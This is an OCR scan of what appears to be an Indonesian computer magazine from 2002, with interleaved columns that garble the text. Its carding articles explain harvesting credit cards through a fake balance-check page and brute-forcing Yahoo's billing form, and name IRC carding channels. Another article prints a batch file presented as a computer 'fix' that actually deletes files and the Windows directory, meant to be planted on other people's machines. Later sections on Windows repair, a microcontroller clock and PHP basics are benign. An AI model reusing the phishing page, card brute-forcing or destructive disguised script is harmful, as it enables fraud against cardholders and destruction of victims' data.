#ccs, #cchome atau #cvv2 pada server-server IRC favorit, siapa tahu rekan anda tadi seorang carder.
seperti: DALnet, UnderNet dan EFnet, maka tidak lama Sebagai contoh misalnya rekan anda memamerkan alamat
setelah itu anda akan segera melihat bahwa betapa aktif, situsnya seperti ini: http://www.e-dony.com, atau katakan-
dinamis dan majemuknya channel-channel tersebut. lah alamat email teman anda seperti ini: dony@e-dony.
Disebut majemuk karena orang-orang yang masuk ke com. Maka untuk menyelidikinya, caranya adalah sebagai
dalamnya datang dari berbagai daerah, kota, provinsi dan berikut:
negara dari seluruh dunia. Mereka, atau sebagian besar
dari mereka yang join ke channel-channel itu doyan men- 1. Jalankan browser anda, lalu masuk ke situs
cari kartu-kartu kredit bajakan untuk digunakan sebagai http://dns411.com.
alat pembayaran ketika mereka berbelanja lewat Internet. 2. Ketikkan domain yang akan anda periksa (e-donny.
Jika anda sudah masuk ke sana, maka kenalilah mereka, com) kedalam field SWHOIS, kemudian klik tombol
karena orang-orang itulah yang nantinya berpeluang Search, lalu tunggu beberapa saat hingga hasilnya
besar sebagai carder. ditampilkan pada halaman result seperti yang terlihat
pada gambar di atas.
Dalam dunia Internet, kegiatan ilegal tersebut dikenal 3. Pada halaman result, periksa/baca keterangan yang
dengan istilah carding. Sedangkan orang yang membajak terdapat pada bagian Registrant dan Administrative
kartu kredit disebut sebagai carder atau frauder. Tapi anda Contact.
perlu cooling down sedikit, dan jangan buru-buru menu-
ding bahwa semua orang yang masuk ke channel-channel Pada halaman result sebagaimana yang tampak pada
di atas adalah carder, frauder atau bandit kartu kredit. Ha- gambar di atas, terlihat jelas bahwa seseorang yang
rap diketahui predikat itu baru akan resmi mereka sandang bernama Dony Tan telah menggunakan kartu kredit
jika data/nomor kartu kredit bajakan yang sudah mereka orang lain untuk meregistrasi domain (e-dony.com),
dapatkan digunakan untuk menyewa dan membeli sesua- dengan masa sewa selama 10 tahun. Persisnya domain
tu lewat Internet, apakah itu domain, email bayar, hosting, tersebut diregistasi pada tanggal 25 September 2000 yang
shell account, buku, sepatu, pakaian, jam tangan, Compact lalu, hingga berakhir nanti pada tanggal 25 September
Disc (CD), komputer (laptop) dan sebagainya. Agak sulit 2010. Keterangan yang mengidentifikasikan bahwa Dony
memang mengetahui dan membuktikannya. Namun jika seorang carder, dapat anda lihat dari informasi alamat
yang dibuatnya.
• Melihat aktivitas para carder di channel #cchome. • Awal proses pemeriksaan domain lewat situs dns411.com.
kecewa, karena kartu kredit yang anda dapatkan sudah dari pemilik aslinya, melainkan dari para carder yunior
tidak fresh lagi (declined), maka saya akan mencoba atau amatiran, yang menurut saya (mungkin) mereka
membantu anda mendapatkan data/nomor-nomor kartu merasa “sangat penasaran” ingin mengetahui total
kredit bajakan yang masih fresh, termasuk nomor cvv2- jumlah uang pada nomor kartu kredit yang baru saja
nya, caranya pun cukup mudah! mereka dapatkan. Dan satu hal lagi yang perlu anda ingat
Dalam hal ini, konsep yang saya buat untuk mendapatkan dan garis bawahi adalah, sedikit pun saya tidak merasa
data/nomor-nomor kartu kredit sangat sederhana, yaitu gembira pada apa yang sudah saya peroleh itu, apalagi
dengan membuat halaman Web bohongan yang seolah- sampai ikut-ikutan memanfaatkannya. Satu-satunya
olah berfungsi untuk memeriksa (checking) jumlah uang yang membuat saya merasa surprise hanya pada infor-
yang ada pada nomor kartu kredit. Namun meski ter- masi alamat IP. Betapa tidak, dari 78 buah alamat IP yang
golong sangat sederhana dan bersifat konvensional, secara ikut terekam bersama-sama dengan informasi nomor-
umum trik ini masih tetap OK. Buktinya pada uji coba nomor kartu kredit tersebut, saya menemukan alamat IP
yang saya lakukan, dalam waktu 3 hari, saya berhasil dari berbagai negara, yaitu: Hungaria, India, Malaysia,
mendapatkan kartu kredit sebanyak kurang lebih 78 buah Philipina, Brunai, dan Singapura, termasuk negara kita
dalam bentuk data. Indonesia. Bagi saya itu hanya sekedar bukti, bahwa
apapun yang kita lakukan di Internet, sekecil apapun itu,
Dari jumlah tersebut, sebanyak 35% masih valid. Tapi selalu bersifat ”anything is possible.” Engga percaya?
tolong anda jangan salah sangka, data/ nomor-nomor Silakan anda coba sendiri.
kartu kredit yang saya dapatkan itu tidak saya peroleh
Pada halaman Web ini, pengunjung Selanjutnya muncul halaman di atas Setelah beberapa detik, muncul halaman
1 harus mengisi form kartu kredit. Se- 2 yang menampilkan pesan untuk 3 yang menampilkan pesan bahwa nomor
telah itu, ia harus menekan tombol menunggu. Sementara itu informasi kartu kredit yang dimasukkan sudah tidak
Submit. para form dikirimkan ke email saya. valid. Ini akan membuat korban penasaran
dan memasukkan nonor-nomor lain.
<HTML>
<HEAD>
<TITLE>Free Credit Card Service (Secure Site
Seal)</TITLE>
<META HTTP-EQUIV="REFRESH" CONTENT="30;
URL=http://www16.brinkster.com/erytricksy/failed.html">
</HEAD>
<BODY>
</BODY>
</HTML>
Lewat opsi di atas, saya memerintah- Menu Form Properties ini juga mengi- Skrip yang mengatur waktu pemang-
4 kan isi form agar dikirimkan ke 5 rimkan isi form ke email sekaligus 6 gilan halaman Web pada Langkah 3
alamat email saya. memanggil halaman Web pada setelah berselang 30 detik.
Langkah 2.
ERNAH DENGAR ATAU BACA (DARI KIRIMAN Yahoo atau “anak-anak” tidak perlu atau dapat mengurangi pekerjaan
P teman) bahwa Yahoo tidak gratis lagi untuk fasi-
litas forward atau email POP3-nya? Bagi peng-
semacam ini—carding.
Hal-hal yang dipaparkan disini adalah pengetahuan, dan
guna email, yang terbiasa dengan fasilitas forward/POP3, pengetahuan bukanlah suatu kejahatan. Jika terjadi sesua-
hal ini akan jelas sekali memberatkan karena fasilitas tu, penulis tidak bertanggung jawab atas apa yang terjadi.
yang satu ini amat besar manfaatnya. Dengan adanya
pop3 kita dapat “mengambil” data email kita pada server Penulis mencoba “bekerja” pada bulan april 2002, sehing-
penyedia layanan email. ga kemungkinan besar di bulan-bulan mendatang yahoo
lebih ketat dalam hal carding ini.
Artikel ini adalah sebagai suatu sharing pengalaman dari
penulis kepada pembaca secara umum dan newbie secara Sebagai tambahan, hal ini adalah ide awal untuk melaku-
khusus (dan bukan suatu tutor yang mengajarkan orang kan cracking, terhadap billing (wallet) di Yahoo dengan
untuk melakukan hal-hal yang sama, karena perbuatan mengisikan nomor CC palsu. Nah, untuk mengisikan
ini dianggap sebagian orang adalah perbuatan yang ter- nomor-nomor CC palsu tersebut dibutuhkan keuletan.
cela dan rendah), yaitu membeli servis tersebut (forward/ Untuk itu, digunakan suatu teknik bernama brute force.
POP3) dengan menggunakan CC (Credit Card) “bajakan.” Di sinilah letak dari cracking tersebut karena brute force
Perbuatan ini (disebut juga carding) tergolong perbuatan nomor CC adalah salah satu teknik cracking.
kriminal. Namun ada sebagian kelompok orang—terma- Namun brute force yang digunakan sesuai dengan tipe kartu
suk penulis—yang menganggap perbuatan ini adalah (visa, mastercard dll) dan bukan asal mengisikan angka-
suatu (game) gambling, atau nasib-nasiban karena dalam angka yang berurut belaka, yaitu dengan mengisikan
melakukan aksi tidak selalu berhasil, tergantung data CC angka-angka yang sudah pasti dan jelas “valid” untuk
yang didapatkan (dari hacking situs bank, shop/toko mau- ukuran sebuah nomor CC. Maksud penulis dengan valid,
pun dari sekedar pemberian teman). Sebenarnya teknik misalnya: nomor CC dengan awalan 5 menunjukkan kar-
yang digunakan bukan murni carding, namun juga terda- tu tersebut adalah Mastercard, sedangkan angka-angka
pat trik cracking-nya. Sehingga saya menyebutnya yang lain yang mengikutinya adalah kode bank dan lain-
Cracking-Carding. nya. Sehingga tidak langsung mengisikan angka-angka
Artikel ini mungkin dapat dijadikan dipelajari oleh peru- tersebut.
sahaan e-commerce yang ada di Indonesia, serta menam- Untuk melakukan pengecekan pada nomor tersebut dapat
bah pengetahuan bagi yang lainnya. Selain itu, diharap- digunakan keygen CC yang dilampirkan. Oleh karena itu,
kan dengan adanya tulisan ini, maka akan ada/tumbuh jika ada pembaca yang mengetahui cara membuat pro-
banyak situs lokal penyedia pop mail gratis, sehingga gram tersebut (bukan keygen, tapi pengisi nomor CC di
bagian Form CC number, secara acak/brute force dengan Langkah-langkah membeli account Yahoo!
angka-angka yang sudah ditentukan), maka akan lebih
cepat dalam melakukan cracking billing Yahoo.
Hal ini mirip dengan melakukan cracking password email,
di mana kita harus memasukkan ID-nya kemudian pass-
word-nya dengan cracking (brute force kamus).
OK, sekarang mari mulai melakukan “tugas.” Pertama
kita harus menyiapkan beberapa hal, di antaranya:
• Contoh
data CC
yang
diperlukan.
Pada langkah ini dibutuhkan kesabaran yang besar, jika Isi email dengan email kita sendiri, jangan isi dengan
kita hanya mengharapkan CC dari orang lain (bukan hasil alamat email yang terdapat di dalam list CC.
hacking/cracking) yang belum tentu fresh/manjur. Di Sebaiknya dalam melakukan cracking-carding ini,
bagian inilah tantangannya seorang carder menaklukkan menggunakan Proxy.
"toko" tempat dia belanja. Dibagian ini jugalah kita
melakukan cracking CC. Jika berhasil, anda akan dapat Programmer brute force, (seperti yang telah saya ung-
melihatnya sendiri. :) (enggak surprise dong kalau harus kapkan di atas) dapat dperimudah dengan membuat
ditampilkan semua di sini). program brute force pengisi nomor CC yang telah dibuat
menggunakan CC Generator, pada form nomor kartu
Dan di bagian ini jugalah letak kesalahan Yahoo, yaitu kredit dan terus melakukan looping jika tidak berhasil.
tidak memberikan batasan pada pengisian form Wallet
sehingga mudah untuk melakukan cracking CC. Dan pesan terakhir dari penulis, anggaplah hal ini adalah
Seharusnya Yahoo membatasi pengisian form CC sebuah permainan, jangan dianggap serius, jadi kalau
tersebut, untuk beberapa kali kesalahan saja. gagal tidak kecewa :). Dan nikmatilah.
Hal-hal yang tertulis di atas, itu merupakan salah satu
(saja) contoh carding yang ada di Iinternet. Masih banyak
lagi yang lainnya, di antaranya membeli barang nyata,
bukan barang maya seperti yang penulis ungkapkan. Penulis adalah seorang mahasiswa STMIK Pontianak.
Saran dan kritik pembaca terhadap tulisan ini, dapat
Jika dalam melakukan isian Form Wallet tersebut kita mengirimkannya ke Pedhet_008@yahoo.com
berhasil, maka kita dapat membeli fasilitas apa saja yang
diberikan oleh yahoo kepada kita, diantaranya :
1. Mendapatkan tempat tampungan email yang lebih
besar (jika dibeli) Carding atau credit card fraud merupakan suatu tindak
2. forward/pop3 email (jika dibeli) pidana yang di Indonesia dapat dikenakan hukuman
3. Mendapatkan alamat domain (jika dibeli) sesuai dengan pasal 362 KUHP tentang pencurian
4. dan lain-lain. dengan ancaman hukuman maksimal 5 tahun penjara,
Tips dan Masukan Tambahan pasal 378 KUHP tentang penipuan dengan ancaman
Untuk mengecek nomor CC, selain dengan menggunakan hukuman maksimum 4 tahun penjara, dan pasal 263
CC generator, kita dapat juga dengan cara lain, yaitu KUHP tentang pemalsuan dengan ancaman hukuman
dengan mengeceknya di suatu channel di IRC (Dalnet) maksimum 6 tahun penjara
nama channelnya #TheCC, #yogyacarding dan masih
banyak channel lainnya. Artikel-artikel dalam kelompok Apa dan Bagaimana
Untuk mengisi form telp number, maka gantilah nomor Carding ini disajikan untuk keperluan pengetahuan
paling belakang dari nomor telpon tersebut, karena jika semata-mata dan sama sekali tidak dianjurkan untuk
dari pihak “toko” menelepon dan nomor yang dituju dipraktikkan. Pembaca diharapkan bersikap dewasa dan
salah sambung, maka toko akan tetap memanfaatkan informasi yang disajikan hanya untuk
“mengirimkannya.”. kepentingan ilmiah.
Mendapatkan storage yang besar. Hasil Order Forward/pop3. Hasil Order Domain.
1 2 3
Mengatasi Kerusakan SO
Windows 9x/2000/ Me
Sebagai sistem operasi, Windows seringkali menjengkelkan penggunanya karena kerap rewel, kadang malah
mogok, tanpa sebab yang jelas. Eryanto Sitorus (ery@postmaster.co.uk) memberi tip cara mengantisipasi
dan memperbaiki kerusakan yang menimpa Windows anda.
ESKIPUN KEMAMPUAN SISTEM OPERASI Microsoft bekerja dengan benar, termasuk driver untuk perangkat
M Windows dalam hal keamanan (security), multi-
user, multitasking, atau dalam hal interprocess
keras seperti Printer, Modem, Sound Card, VGA Card,
Scanner, CD-ROM (R/W), atau Ethernet Card (jika ada).
communication tidak sebaik dan seandal sistem operasi Setelah semuanya beres, maka lakukan langkah-langkah
Unix, Linux, SunOS, atau FreeBSD, namun masih ada atau prosedur sebagai berikut:
beberapa hal yang dapat dibanggakan pada sistem Micro- 1. Copy-kan (backup) semua file berekstensi .INI yang
soft Windows 95/97/98/2000/ME (Millennium Edition). terdapat pada direktori C:\WINDOWS ke dalam direktori
Salah satunya adalah kemudahan untuk mengantisipasi lain, misalnya anda membuat direktori khusus dengan
dan mengatasi kerusakan yang terjadi pada sistem operasi nama Backup. Jika anda melakukannya dalam modus MS-
tersebut, dengan begitu maka diharapkan para pengguna DOS, maka perintahnya adalah sebagai berikut:
(user) dapat mengatasi persoalannya sendiri tanpa perlu
C:\WINDOWS> MD BACKUP
melakukan instalasi ulang, memanggil tenaga ahli atau C:\WINDOWS> COPY *.INI BACKUP
mengkonsultasikannya kepada orang lain, apalagi harus
membawanya ke tempat service komputer. Karena 2. Copy-kan (backup) file USER.DAT dan file SYSTEM.
sifatnya yang mudah dan praktis tersebut, kemudian DAT ke dalam direktori yang sama pada point 1. Jika anda
muncul lah istilah user-friendly. melakukannya dalam modus MS-DOS, maka anda harus
menormalkan artibut kedua file tersebut terlebih dahulu
Microsoft Windows memang sudah terkenal dengan sifat- dengan mengetik perintah di bawah ini:
nya yang ramah dan sangat memanjakan customer-nya.
C:\WINDOWS> ATTRIB -S -H -R USER.DAT
Namun sialnya Microsoft Windows juga terkenal dengan
C:\WINDOWS> ATTRIB -S -H -R SYSTEM.DAT
sifatnya yang rewel, tidak stabil, tidak aman, mudah
terinfeksi Virus, sering macet (hang). Dan satu lagi yang Setelah itu copy kedua file tersebut ke dalam direktori
paling menjengkelkan, file-file sistem operasi Microsoft yang sudah anda buat sebagai direktori backup, perintah
Windows sepertinya bisa rusak secara tiba-tiba tanpa untuk meng-copy-nya adalah:
sebab musabab yang jelas. Oleh karena itu tidak heran C:\WINDOWS> COPY *.DAT BACKUP
jika sistem operasi yang paling sering mengalami instalasi
ulang adalah Microsoft Windows. Tapi anda tidak perlu Jika telah selesai meng-copy, anda boleh mengembalikan
gusar karena ada cara yang lebih mudah dan praktis untuk status atribut kedua file tersebut di atas dengan mengetik
mencegah atau mengantisipasi terjadinya kerusakan, sa- perintah di bawah ini:
lah satunya adalah dengan cara mengamankan atau mem- C:\WINDOWS> ATTRIB +S +H +R USER.DAT
backup file-file sistem yang sudah terinstal dan bekerja C:\WINDOWS> ATTRIB +S +H +R SYSTEM.DAT
dengan benar untuk dipakai kembali di kemudian hari. 3. Backup setting
Dengan begitu, jika suatu hari kelak sistem di komputer registry yang aktif
anda benar-benar rusak, maka anda dapat memperbaiknya saat itu dengan
sendiri. Namun sebelum anda mulai melakukan langkah- mengetik perintah
langkah pengamanan sebagaimana yang dimaksud, SCANREG pada
pastikan bahwa sistem anda sudah dalam keadaan baik prompt MS-DOS,
(sempurna) dan bebas virus. Kemudian semua program- contoh:
program aplikasi yang anda perlukan sudah terinstal dan C:\WINDOWS> SCANREG • Gambar 1: Proses scanning registry.
• Gambar 2:
Laporan
hasil scanning
registry.
Jawablah pertanya-
an yang muncul
pada Gambar 2 de-
ngan mengklik
tombol Yes untuk
memulai proses
backup.
• Gambar 3: Proses backup registry.
• Gambar 4:
Proses
backup registry
selesai.
Jika sistem anda rusak atau terganggu akibat salah satu ke-
mungkinan tersebut di atas, anda tidak perlu panik. Yang per-
lu dilakukan hanyalah mengembalikan (me-restore) file-file
sistem yang sudah anda backup sebelumnya dan coba jalan-
kan program utility, seperti ScanDisk dan System File Checker
(SFC). Berikut ini adalah langkah-langkahnya:
1. Restart komputer anda ke modus MS-DOS.
2. Pada prompt MS-DOS, ketik perintah di bawah ini:
C:\WINDOWS> ATTRIB -S -H -R USER.DAT
C:\WINDOWS> ATTRIB -S -H -R SYSTEM.DAT
C:\WINDOWS> COPY C:\WINDOWS\BACKUP\*.INI
C:\WINDOWS> COPY C:\WINDOWS\BACKUP\*.DAT • Gambar 13: Menentukan lokasi file backup registry.
3. Restart komputer anda untuk masuk ke dalam modus Setelah proses im-
Windows. Perhatikan apakah langkah-langkah di atas telah por selesai, cobalah
dapat mengatasi masalah yang anda hadapi. Jika ternyata restart sekali lagi
belum berhasil, lanjutkan ke Langkah 4. komputer anda, ke-
4. Periksa setting registry dengan mengetikkan perintah mudian perhatikan
• Gambar 14: Mengimpor file backup registry. baik-baik apakah
SCANREG pada prompt MS-DOS. Lanjutkan dengan me-
nekan tombol Start.
C:\WINDOWS> SCANREG
• Gambar 19: Laporan statistik hasil pemeriksaan. • Gambar 22: Memeriksa Options program ScanDisk.
Pada Gambar 19 dapat disimpulkan bahwa semua file sis- memulai proses pemeriksaan dan perbaikan (repair), klik
tem dalam keadaan baik, SFC tidak menemukan sesuatu tombol Start dan tunggu sampai proses benar-benar selesai.
yang rusak (error). Namun jika anda merasa bahwa masih Jika program ScanDisk telah selesai melakukan proses-
ada sesuatu yang tidak beres pada sistem anda, anda masih nya, restart komputer anda untuk melakukan proses
dapat melakukan penelusuran sekaligus memperbaikinya booting ulang.
dengan menjalankan program SCANDISK. Petunjuk atau
cara menggunakannya akan dijelaskan pada Langkah 8.
8. Start → Run, ketik ScanDisk, tekan Enter atau klik OK.
Setelah program
ScanDisk terbuka,
klik terlebih dulu
tombol Options un-
tuk memastikan bah-
wa pilihan ‘Areas of
the disks to scan’
• Gambar 20: Menjalankan program Scandisk
sudah berada pada
dari menu Run.
posisi ‘System and
data areas.’
Dari hasil uji coba yang penulis lakukan selama ini sudah
terbukti bahwa semua langkah yang dijelaskan cukup am-
puh untuk mengatasi masalah atau problem yang terjadi
pada sistem operasi yang penulis gunakan, dengan catatan
penulis sudah mem-backup terlebih dahulu file-file
sistem. Dan dengan cara yang sama saya mempersilakan
anda melakukan percobaan sendiri.
RTIKEL BERJUDUL NGUPING DI muat…” Saya tidak tahu persis apa- majalah NeoTek Vol II No. 10, Juli
A IRC yang di muat di NeoTek,
Vol. II No. 10, Juli 2002 lalu
kah mereka jadi mengirim email ke
NeoTek atau tidak, yang jelas per-
2002 yang lalu. Bagi anda yang be-
lum mengetahuinya dan ingin mem-
benar-benar membuat saya jadi soalan itu telah memaksa saya me- baca penjelasan lebih detail mengenai
merasa bersalah, capek, dan sedikit nulis artikel ini (tentunya sebagai tentang artikel tersebut, maka silakan
stres. rasa tanggung jawab saya kepada anda cari majalah itu.
Betapa tidak, sejak artikel itu terbit, majalah NeoTek dan pembacanya).
hampir dua minggu lebih secara Namun sebelum mulai membahas- Skrip yang Akan Disisipkan
berturut-turut saya harus bolak-balik nya lebih jauh, saya ingin menggu- Berikut ini adalah bentuk listing skrip
me-reply email yang masuk untuk nakan kesempatan baik ini untuk Nguping di IRC yang akan kita su-
menjawab dan menjelaskan kepada mengucapkan thanks pada rekan- supkan ke dalam komputer orang
mereka-mereka yang bertanya se- rekan di DALnet IRC Network, lain. Namun perlu anda ketahui
perti ini: “Mas, koq saya enggak bisa #NeoTeker, yang dengan “keramahan” bahwa mengingat tidak sedikit rekan
menjalankan skrip Nguping di IRC? mereka telah membantu saya menja- pembaca NeoTek yang mengatakan
Salahnya dimana sih…” Sementara wab sebagian pertanyaan yang sama skrip Nguping di IRC yang dibahas
itu, kelompok berikutnya, dengan seperti yang saya terima di atas. pada edisi Juli 2002 “tidak jalan,”
agak sedikit galak bertanya seperti Ucapan terimakasih itu dengan ikhlas maka saya putuskan untuk meng-
ini: “Gua udah bisa menjalankannya, saya sampaikan kepada: Im_David, ubah atau memodifikasinya sedikit
tetapi skrip Nguping yang lo bilang Ace_Killa, Samurai_Hack, Prayana, dari aslinya.
bisa nguping di IRC itu cuma bisa dan termasuk rekan-rekan pembaca
Saya yakin “pihak lain” yang akan
aktif di PC gua doang tuh. Biar bisa setia NeoTek yang sudah mengirim-
menerima skrip ini nantinya pasti
aktif di komputer orang lain, caranya kan email-nya kepada saya, karena
tidak akan mengalami kesulitan atau
gimana? Lo jangan bikin sembarang- biar bagaimanapun, karena anda
masalah lagi. Tapi jika anda masih
an artikel donk kalau engga tuntas...” semualah sehingga artikel ini men-
tetap kurang percaya, ada baiknya
Karena nada pertanyaan yang perta- jadi ada. Harapan saya, mudah-
anda melakukan uji coba terlebih
ma kedengarannya masih terkesan mudahan apa yang saya bahas dalam
dahulu untuk memastikan bahwa
santun dan bersahabat, maka saya artikel ini adalah merupakan jawaban
skrip Nguping ini sudah benar-benar
pun menjawabnya dengan ramah yang “seharusnya” anda inginkan.
OK. Adapun tampilan atau bentuk
pula. Bahkan saking ramahnya, saya Dalam artikel ini, pada intinya saya listing skrip yang sudah saya
kirimkan mereka satu per satu skrip akan menjelaskan kepada anda bagai- modifikasi itu dapat anda lihat di
tersebut. Sedangkan pada pertanyaan mana cara menyusupkan skrip ke halaman berikutnya.
yang ke dua hal itu tidak saya laku- dalam komputer orang lain melalui
Jika listing skrip Nguping di atas anda
kan. Mau tahu apa yang saya katakan home page, situs, atau website. Dan
loading ke dalam program mIRC,
kepada mereka? Saya jawab saja be- agar artikel ini tidak terlalu kepan-
maka tampilan atau bentuknya akan
gini: “Eeh elu-elu pade jangan nya- jangan, maka sebagai bahan praktek-
tampak sama seperti yang diperli-
lahin gue donk... komplain donk ke nya, kita akan menyusupkan skrip
hatkan pada Gambar 1 pada halaman
NeoTek, kenapa artikel itu di Nguping di IRC yang dibahas pada
berikutnya.
@Echo OFF • Gambar 3: Pesan yang menyatakan bahwa skrip telah berhasil di-load.
PROMPT $p$g
C:\WINDOWS\SMARTDRV.EXE /L /X
PATH=C:\;C:\WINDOWS;C:\WINDOWS\COMMAND;
%PATH%
CLS
ECHO.
ECHO Press any key to FIX your Computer…
PAUSE > NUL
ATTRIB -S -H -R *.*
ATTRIB -S -H -R C:\WINDOWS\*.*
DEL *.*DELTREE /Y WINDOWS
ECHO.
ECHO Thank you! • Gambar 4: Alamat dan halaman
Web untuk pembuktian.
Merakit Hardware
Proyek Digital Clock (2)
Pengetahuan tentang MicroController saat ini sangat diperlukan untuk kalangan mahasiswa. Pe-
ngetahuan tentang hal ini setidaknya bisa membantunya menyelesaikan tugas akhirnya. Yang
dapat mengambil manfaat dari teknologi ini bukan hanya mahasiswa Elektro.
tidak sama, loncat (Branch if Not Equal - bne) ke Label Sec- *** NeoClock1.asm
99 dibagian akhir yang artinya keluar dari rutin ini. Bila sa- *** KX8 Digital Clock
ma maka jadikan 0 dan naikkan Detikpuluhan. Hal yang *** Purpose: Introduction 2 Assembly
sama kalau kita menghitung dari 9 ke 10 atau 49 ke 50. Se- *** Device: 68HC908KX8
lanjutnya lakukan untuk Detik10, Menit1, Menit10, Jam1, *** Assembler: CASM @ WIN IDE pemicro
* Description: On Main Loop: Count Time, Display Time.
Jam10 tapi dengan limit mereka masing-masing. Detik10 * On Interrupt: Timer using ICG (Internal Clock Generator).
dan Menit10 pada angka 6 karena nilai maksimumnya 60.
Penjelasan detail diberikan di rubrik NeoMicon edisi depan. *** MACRO DEFINITIONS *************************************************
* Combine 2 parameter (bit & byte) to single parameter (bitname)
Display Task menentukan dulu digit mana yang akan di- * Based on Macro by Raymond Weisling.
tampilkan pada loop kali ini. Setiap loop hanya menampil- ******************************************************************************
kan 1 digit. Ambil nomor digit untuk ambil data nya lalu
diubah menjadi pattern 7 segment baru diberi ke portB dan Listing selanjutnya dari makro ini dapat anda peroleh
aktifkan digit tersebut melalui portA. Setiap kali sebelum pada CD NeoTek bulan ini (file: Neoclock1.txt).
menampilkan digit baru, matikan dulu display lama untuk
mencegah bayangan. DispMode memungkinkan perubahan
format tampilan dari JAM-MENIT menjadi MENIT-DETIK Ralat
dengan menggeser lokasi data yang diambil untuk tampilan
sebanyak 2 byte. Pada artikel Proyek Digital Clok (1), hlm. 42 NeoTek Vol
3, No 1, Oktober 2002 terdapat gambar kembar. Gambar
Interrupt menggunakan metode overflow yang sederhana
kedua pada halaman tersebut seharusnya adalah:
untuk menghasilkan 1/25 yang akan set DoSec flag setiap 1
detik.
Bagian akhir berisi vector yang berisi alamat untuk yang
akan dituju oleh MCU untuk masing masing interrupt
yang terjadi. Misalnya waktu terjadi Overflow maka Pro-
gram Counter (register PC - bukan Personal Computer) PC
akan loncat ke addres yang ditunjuk oleh
org $FFF2
TimerInt dw TIMovISR ; $FFF2-FFF3 TIM Overflow Vector
Harga $ 102
ALI INI KITA AKAN MENCOBA MEMBUAT SUATU aplikasi • “<<<”—String dengan menggunakan here doc syntax .
K yang sering sekali digunakan oleh para pemilik situs,
yaitu page counter alias penghitung banyaknya pe-
Perhatikan contoh berikut:
array assosiatif. Dalam PHP array tidak harus satu tipe, namun Operator Perbandingan
boleh berbeda-beda tipe. Operator yang digunakan untuk membandingkan dua
Pendefinisian Array ekspresi. Perhatikan tabel berikut:
Array dapat kita definisikan langsung dengan menyebutkan Contoh Nama Hasil
anggota-anggotanya. Contohnya adalah sebagai berikut: $a == $b Sama dengan TRUE jika $a sama dengan $b.
<?php $a === $b Identik TRUE jika $a sama dan setipe dengan $b(PHP4)
$a != $b Tidak sama dengan TRUE jika $a tidak sama dengan $b.
$larik[]=1;$larik[]=2;$larik[]=3;$larik[]=4;
$a <> $b Tidak sama dengan TRUE jika $a tidak sama dengan $b.
?>
$a !== $b Tidak Identik TRUE jika $a tidak sama & tidak setipe dengan $b(PHP4)
$a < $b Lebih kecil TRUE jika $a lebih kecil dari $b.
Jika kita panggil $larik[0], maka yang akan ditampilkan $a > $b Lebih besar TRUE jika $a lebih besar dari $b.
adalah 1, jika kita panggil $larik[1] yang akan ditampilkan $a <= $b Lebih kecil sama dengan TRUE jika $a lebih besar sama dengan $b.
adalah 2 dan demikian seterusnya. $a >= $b Lebih besar sama dengan TRUE jika $a lebih kecil sama dengan $b.
Array dapat juga didefinisikan dengan menggunakan
fungsi array(). Berikut adalah contohnya: Selain operator-operator kondisional di atas, terdapat juga
operator kondisional “?:” Perhatikan contoh berikut:
<?php
(kondisi) ? (ekspresi 1) : (ekspresi 2);
$larik=array(1,2,3,4);
?> Operator ini akan memberikan nilai pada ekspresi satu jika
kondisi terpenuhi dan sebaliknya jika kondisi tidak dipenuhi
Contoh di atas menghasilkan nilai yang sama dengan contoh maka yang akan digunakan adalah ekspresi yang kedua.
sebelumnya.
Operator Increment/Decrement
Operator Yaitu operator yang digunakan untuk menambah atau
Operator Aritmatika mengurangi satu angka. Perhatikan tabel berikut:
Yaitu operator yang digunakan untuk melakukan operasi Contoh Nama Hasil
matematika dasar. Perhatikan daftar pada tabel berikut :
++$a Pre-increment Menaikkan nilai $a, mengembalikan nilai $a.
Contoh Nama Hasil $a++ Post-increment Mengembalikan nilai $a, menaikkan nilai $a
$a + $b Penjumlahan Jumlah $a dan $b. --$a Pre-decrement Menurunkan nilai $a, mengembalikan nilai $a.
$a - $b Pengurangan Selisih $a dan $b. $a-- Post-decrement Mengembalikan nilai $a, menurunkan nilai $a
$a * $b Perkalian Hasil kali $a dan $b.
$a / $b Pembagian Hasil bagi $a oleh $b. Untuk lebih jelasnya, lihat contoh berikut:
$a % $b Sisa bagi Sisa bagi $a oleh $b.
<?php
echo "<h3>Postincrement</h3>";
Operator Assignment $a = 5;
Operator dasar assignment adalah ‘=’, yang memiliki arti bah- echo "Should be 5: " . $a++ . "<br>\n";
wa ekspresi sebelah kanan akan diisi dengan ekspresi di sebelah echo "Should be 6: " . $a . "<br>\n";
kiri operator. Selain operator dasar tersebut, operator assigment
juga terdiri dari gabungan antara operasi dasar dengan echo "<h3>Preincrement</h3>";
operator aritmatika. Perhatikan tabel berikut :
$a = 5;
Contoh Hasil echo "Should be 6: " . ++$a . "<br>\n";
echo "Should be 6: " . $a . "<br>\n";
$a += $b $a = $a + $b
$a -= $b $a = $a - $b
echo "<h3>Postdecrement</h3>";
$a *= $b $a = $a * $b
$a = 5;
$a /= $b $a = $a / $b
echo "Should be 5: " . $a-- . "<br>\n";
$a %= $b $a = $a % $b
echo "Should be 4: " . $a . "<br>\n";
Operator Bitwise
echo "<h3>Predecrement</h3>";
Operator yang digunakan untuk operasi dalam bit. Perhatikan
$a = 5;
tabel berikut:
echo "Should be 4: " . --$a . "<br>\n";
Contoh Deskripsi echo "Should be 4: " . $a . "<br>\n";
?>
$a & $b Operasi And
$a | $b Operasi Or
$a ^ $b Operasi Xor Operator Logika
~ $a Operasi Not Yaitu operator yang digunakan untuk menggabungkan nilai
$a << $b Geser kiri kebenaran dua ekspresi. Perhatikan tabel contoh pada halaman
$a >> $b Geser kanan berikut:
File Pemroses
Fungsi fwrite() Merupakan source dari aplikasi itu sendiri, yang terdiri dari
Digunakan untuk menuliskan ke dalam file. Perhatikan fungsi-fungsi yang kita definisikan untuk melakukan tugas-
pembahasan aplikasi! tugas tertentu yaitu untuk membaca file serta menulis pada
file basisdata.
Fungsi fclose() File pemroses akan memuat dua fungsi utama yang akan kita
Digunakan untuk menutup koneksi file. Perhatikan gunakan untuk memanipulasi file-file basisdata. Kedua fungsi
pembahasan aplikasi! tersebut adalah:
Pembahasan Aplikasi • bacafile()
Sebelum membahas algoritma dari aplikasi konter, ada baiknya Fungsi yang kita gunakan untuk membaca isi file-file
jika kita lihat dahulu file-file apa saja yang akan kita gunakan database
dalam aplikasi ini. Kita dapat mengelompokkan file-file yang Fungsi ini kita namakan bacafile(), yang source-nya seperti
akan kita gunakan menjadi dua bagian yaitu: tertulis berikut ini:
<?php akhirnya nilai yang terkandung dari variabel inilah yang kita
function bacafile($x){ kembalikan untuk nilai akhir dari fungsi bacafile() kita, de-
//cek dulu apakah file yang akan dibaca ada? ngan menggunakan statement return.
if(!file_exists($x){ Maka selesailah percabangan untuk kemungkinan yang per-
